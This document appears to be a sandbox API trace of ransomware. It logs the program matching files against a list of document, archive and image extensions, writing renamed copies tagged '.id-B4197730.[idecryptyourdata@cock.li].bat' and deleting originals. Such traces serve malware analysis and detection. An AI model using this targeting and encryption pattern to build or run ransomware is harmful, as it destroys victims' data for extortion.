lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0055.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0055.365] lstrlenW (lpString=".jpg") returned 4 [0055.365] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0055.366] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0055.366] lstrlenW (lpString="correct.avi") returned 11 [0055.366] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0055.366] GetFileSizeEx (in: hFile=0x2c0, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=180172) returned 1 [0055.366] CloseHandle (hObject=0x2c0) returned 1 [0055.366] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi")) returned 0x20 [0055.366] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0055.370] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0055.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0055.376] lstrlenW (lpString=".doc") returned 4 [0055.376] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0055.376] lstrlenW (lpString=".docx") returned 5 [0055.376] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0055.376] lstrlenW (lpString=".pdf") returned 4 [0055.376] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0055.376] lstrlenW (lpString=".xls") returned 4 [0055.376] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0055.376] lstrlenW (lpString=".xlsx") returned 5 [0055.376] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0055.377] lstrlenW (lpString=".ppt") returned 4 [0055.377] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0055.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0055.377] lstrlenW (lpString=".zip") returned 4 [0055.377] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0055.377] lstrlenW (lpString=".rar") returned 4 [0055.377] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0055.377] lstrlenW (lpString=".bz2") returned 4 [0055.377] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0055.377] lstrlenW (lpString=".7z") returned 3 [0055.377] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0055.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0055.377] lstrlenW (lpString=".dbf") returned 4 [0055.377] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0055.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0055.377] lstrlenW (lpString=".1cd") returned 4 [0055.377] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0055.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0055.377] lstrlenW (lpString=".jpg") returned 4 [0055.377] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0055.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0055.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0055.377] lstrlenW (lpString=".doc") returned 4 [0055.377] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0055.377] lstrlenW (lpString=".docx") returned 5 [0055.377] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0055.377] lstrlenW (lpString=".pdf") returned 4 [0055.377] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0055.378] lstrlenW (lpString=".xls") returned 4 [0055.378] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0055.378] lstrlenW (lpString=".xlsx") returned 5 [0055.378] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0055.378] lstrlenW (lpString=".ppt") returned 4 [0055.378] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0055.378] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0055.378] lstrlenW (lpString=".zip") returned 4 [0055.378] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0055.378] lstrlenW (lpString=".rar") returned 4 [0055.378] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0055.378] lstrlenW (lpString=".bz2") returned 4 [0055.378] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0055.378] lstrlenW (lpString=".7z") returned 3 [0055.378] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0055.378] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0055.378] lstrlenW (lpString=".dbf") returned 4 [0055.378] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0055.378] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0055.378] lstrlenW (lpString=".1cd") returned 4 [0055.378] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0055.378] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0055.378] lstrlenW (lpString=".jpg") returned 4 [0055.378] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0055.378] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0055.379] lstrlenW (lpString="split.avi") returned 9 [0055.379] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0055.634] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=181964) returned 1 [0055.634] CloseHandle (hObject=0x334) returned 1 [0055.634] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi")) returned 0x20 [0055.634] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0055.634] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0055.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0055.634] lstrlenW (lpString=".doc") returned 4 [0055.634] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0055.634] lstrlenW (lpString=".docx") returned 5 [0055.634] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0055.634] lstrlenW (lpString=".pdf") returned 4 [0055.634] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0055.634] lstrlenW (lpString=".xls") returned 4 [0055.634] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0055.634] lstrlenW (lpString=".xlsx") returned 5 [0055.634] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0055.634] lstrlenW (lpString=".ppt") returned 4 [0055.634] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0055.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0055.634] lstrlenW (lpString=".zip") returned 4 [0055.634] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0055.635] lstrlenW (lpString=".rar") returned 4 [0055.635] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0055.635] lstrlenW (lpString=".bz2") returned 4 [0055.635] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0055.635] lstrlenW (lpString=".7z") returned 3 [0055.635] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0055.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0055.635] lstrlenW (lpString=".dbf") returned 4 [0055.635] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0055.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0055.635] lstrlenW (lpString=".1cd") returned 4 [0055.635] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0055.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0055.635] lstrlenW (lpString=".jpg") returned 4 [0055.635] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0055.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0055.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0055.635] lstrlenW (lpString=".doc") returned 4 [0055.635] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0055.635] lstrlenW (lpString=".docx") returned 5 [0055.635] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0055.635] lstrlenW (lpString=".pdf") returned 4 [0055.635] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0055.635] lstrlenW (lpString=".xls") returned 4 [0055.635] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0055.635] lstrlenW (lpString=".xlsx") returned 5 [0055.635] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0055.635] lstrlenW (lpString=".ppt") returned 4 [0055.635] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0055.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0055.635] lstrlenW (lpString=".zip") returned 4 [0055.635] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0055.635] lstrlenW (lpString=".rar") returned 4 [0055.635] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0055.635] lstrlenW (lpString=".bz2") returned 4 [0055.635] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0055.635] lstrlenW (lpString=".7z") returned 3 [0055.635] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0055.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0055.636] lstrlenW (lpString=".dbf") returned 4 [0055.636] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0055.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0055.636] lstrlenW (lpString=".1cd") returned 4 [0055.636] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0055.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0055.636] lstrlenW (lpString=".jpg") returned 4 [0055.636] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0055.636] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0055.636] lstrlenW (lpString="base_ca.xml") returned 11 [0055.636] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0056.071] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=3529) returned 1 [0056.071] CloseHandle (hObject=0x2c4) returned 1 [0056.071] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml")) returned 0x20 [0056.071] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.071] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.071] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0056.071] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0056.071] lstrlenW (lpString=".doc") returned 4 [0056.071] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0056.071] lstrlenW (lpString=".docx") returned 5 [0056.072] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0056.072] lstrlenW (lpString=".pdf") returned 4 [0056.072] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0056.072] lstrlenW (lpString=".xls") returned 4 [0056.072] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0056.072] lstrlenW (lpString=".xlsx") returned 5 [0056.072] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0056.072] lstrlenW (lpString=".ppt") returned 4 [0056.072] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0056.072] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0056.072] lstrlenW (lpString=".zip") returned 4 [0056.072] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0056.072] lstrlenW (lpString=".rar") returned 4 [0056.072] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0056.072] lstrlenW (lpString=".bz2") returned 4 [0056.072] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0056.072] lstrlenW (lpString=".7z") returned 3 [0056.072] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0056.072] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0056.072] lstrlenW (lpString=".dbf") returned 4 [0056.072] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0056.744] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.745] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.745] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0056.749] GetLastError () returned 0x0 [0056.749] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x285, lpOverlapped=0x0) returned 1 [0056.750] WriteFile (in: hFile=0x348, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x290, lpOverlapped=0x0) returned 1 [0056.751] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0056.751] WriteFile (in: hFile=0x348, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xea, lpOverlapped=0x0) returned 1 [0056.751] SetEndOfFile (hFile=0x348) returned 1 [0056.751] CloseHandle (hObject=0x348) returned 1 [0056.752] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.752] SetEndOfFile (hFile=0x340) returned 1 [0056.753] CloseHandle (hObject=0x340) returned 1 [0056.753] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x26) returned 1 [0056.753] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini")) returned 1 [0056.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0056.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0056.761] lstrlenW (lpString=".doc") returned 4 [0056.761] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0056.761] lstrlenW (lpString=".docx") returned 5 [0056.761] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0056.761] lstrlenW (lpString=".pdf") returned 4 [0056.761] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0056.761] lstrlenW (lpString=".xls") returned 4 [0056.761] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0056.761] lstrlenW (lpString=".xlsx") returned 5 [0056.761] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0056.761] lstrlenW (lpString=".ppt") returned 4 [0056.761] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0056.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0056.761] lstrlenW (lpString=".zip") returned 4 [0056.761] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0056.761] lstrlenW (lpString=".rar") returned 4 [0056.761] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0056.761] lstrlenW (lpString=".bz2") returned 4 [0056.761] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0056.761] lstrlenW (lpString=".7z") returned 3 [0056.761] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0056.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0056.761] lstrlenW (lpString=".dbf") returned 4 [0056.761] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0056.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0056.761] lstrlenW (lpString=".1cd") returned 4 [0056.761] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0056.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0056.761] lstrlenW (lpString=".jpg") returned 4 [0056.761] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0056.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0056.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0056.762] lstrlenW (lpString=".doc") returned 4 [0056.762] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0056.762] lstrlenW (lpString=".docx") returned 5 [0056.762] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0056.762] lstrlenW (lpString=".pdf") returned 4 [0056.762] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0056.762] lstrlenW (lpString=".xls") returned 4 [0056.762] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0056.762] lstrlenW (lpString=".xlsx") returned 5 [0056.762] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0056.762] lstrlenW (lpString=".ppt") returned 4 [0056.762] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0056.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0056.762] lstrlenW (lpString=".zip") returned 4 [0056.762] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0056.762] lstrlenW (lpString=".rar") returned 4 [0056.762] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0056.762] lstrlenW (lpString=".bz2") returned 4 [0056.762] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0056.762] lstrlenW (lpString=".7z") returned 3 [0056.762] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0056.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0056.762] lstrlenW (lpString=".dbf") returned 4 [0056.762] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0056.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0056.762] lstrlenW (lpString=".1cd") returned 4 [0056.762] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0056.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0056.762] lstrlenW (lpString=".jpg") returned 4 [0056.762] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0056.762] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0056.763] lstrlenW (lpString="HandPrints.jpg") returned 14 [0056.763] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.768] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=4222) returned 1 [0056.768] CloseHandle (hObject=0x344) returned 1 [0056.768] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg")) returned 0x20 [0056.768] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.768] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.768] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0056.768] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0056.768] lstrlenW (lpString=".doc") returned 4 [0056.768] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0056.768] lstrlenW (lpString=".docx") returned 5 [0056.768] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0056.768] lstrlenW (lpString=".pdf") returned 4 [0056.768] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0056.768] lstrlenW (lpString=".xls") returned 4 [0056.768] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0056.768] lstrlenW (lpString=".xlsx") returned 5 [0056.768] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0056.768] lstrlenW (lpString=".ppt") returned 4 [0056.769] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0056.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0056.769] lstrlenW (lpString=".zip") returned 4 [0056.769] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0056.769] lstrlenW (lpString=".rar") returned 4 [0056.769] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0056.769] lstrlenW (lpString=".bz2") returned 4 [0056.769] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0056.769] lstrlenW (lpString=".7z") returned 3 [0056.769] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0056.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0056.769] lstrlenW (lpString=".dbf") returned 4 [0056.769] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0056.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0056.769] lstrlenW (lpString=".1cd") returned 4 [0056.769] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0056.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0056.769] lstrlenW (lpString=".jpg") returned 4 [0056.769] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0056.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0056.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0056.769] lstrlenW (lpString=".doc") returned 4 [0056.769] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0056.769] lstrlenW (lpString=".docx") returned 5 [0056.769] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0056.769] lstrlenW (lpString=".pdf") returned 4 [0056.769] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0056.769] lstrlenW (lpString=".xls") returned 4 [0056.769] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0056.769] lstrlenW (lpString=".xlsx") returned 5 [0056.769] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0056.769] lstrlenW (lpString=".ppt") returned 4 [0056.769] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0056.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft 